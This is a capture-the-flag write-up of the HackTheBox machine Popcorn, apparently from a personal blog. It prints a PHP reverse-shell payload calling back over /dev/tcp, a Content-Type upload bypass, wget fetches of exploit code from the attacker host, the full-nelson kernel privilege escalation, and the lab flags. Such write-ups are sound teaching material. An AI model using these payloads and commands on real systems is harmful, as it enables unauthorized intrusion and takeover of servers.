Post

HackTheBox Popcorn

Writeup for HackTheBox Popcorn

HackTheBox Popcorn

Machine Synopsis

Key Exploitation Techniques:

  • Web File Upload Vulnerability (Content-Type bypass)
  • Linux Kernel Privilege Escalation (full-nelson - CVE-2012-0056)

Enumeration

1
2
3
4
5
6
7
8
9
10
$ nmap -sC -sV -A 10.10.10.6

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.12 (Ubuntu)

website

gobuster revealed a /torrent directory and a user registration/login feature.

1
2
3
4
5
6
7
$ gobuster dir -u http://10.10.10.6 -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
...
/index                (Status: 200) [Size: 177]
/test                 (Status: 200) [Size: 47032]
/torrent              (Status: 301) [Size: 310] [--> http://10.10.10.6/torrent/]
/rename               (Status: 301) [Size: 309] [--> http://10.10.10.6/rename/] 
...

torrent_homepage

sign_up

Exploitation

Initial Access (www-data)

After creating and logging into a new account, an upload page was accessible. Initial attempts to upload a PHP reverse shell were met with a “This is not a valid torrent file” error.

torrent_uploadpage

upload_torrent

A valid torrent file was uploaded, revealing an option to “change screenshot.”

edit_torrent

Attempting to upload a PHP reverse shell as a screenshot resulted in an “invalid file” error. This suggested a client-side or server-side file type check based on extension or initial magic bytes.

The upload request was intercepted, and its Content-Type header was changed from application/x-php to image/png. This bypassed the file type validation, allowing the PHP shell to be uploaded

1
2
3
4
5
# Modified HTTP Request
...
Content-Type: image/png

<?php system("bash -i >& /dev/tcp/10.10.14.9/1234 <&1"); ?>

The server response confirmed the successful upload.

torrent_upload_dir

A netcat listener was set up. The reverse shell was triggered by accessing the uploaded file (e.g., http://10.10.10.6/torrent/upload/exploit.php).

1
2
3
# Attacker machine: Netcat listener
$ nc -nlvp 1234
listening on [any] 1234 ...

A www-data shell was obtained.

1
2
3
4
5
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.6] 34129
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -r
2.6.31-14-generic-pae

Privilege Escalation

Linux Kernel Exploit

The kernel version 2.6.31-14-generic-pae was identified. Linux Exploit Suggester (les.sh) was used to find applicable local privilege escalation exploits.

1
2
3
4
5
6
7
8
9
10
11
12
13
$ wget http://10.10.14.9:8000/les.sh
$ chmod +x les.sh
$ ./les.sh
...
Possible Exploits:
cat: write error: Broken pipe
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson

   Details: http://vulnfactory.org/exploits/full-nelson.c
   Exposure: highly probable
   Tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server}
   Download URL: http://vulnfactory.org/exploits/full-nelson.c
...

The full-nelson.c exploit was downloaded, compiled, and executed on the target.

1
2
3
4
$ wget http://10.10.14.9:8000/full-nelson.c
$ gcc full-nelson.c -o full-nelson
$ chmod +x full-nelson
$ ./full-nelson

Execution of full-nelson yielded a root shell

1
2
3
4
5
6
7
8
id
uid=0(root) gid=0(root)
cd /home/george
cat user.txt
c1b9db61d386e3f830c010480ab54077
cd /root
cat root.txt
c5ba80b7f9f478d28cbbf7c59df47478

The user.txt and root.txt flags were retrieved.

This post is licensed under CC BY 4.0 by the author.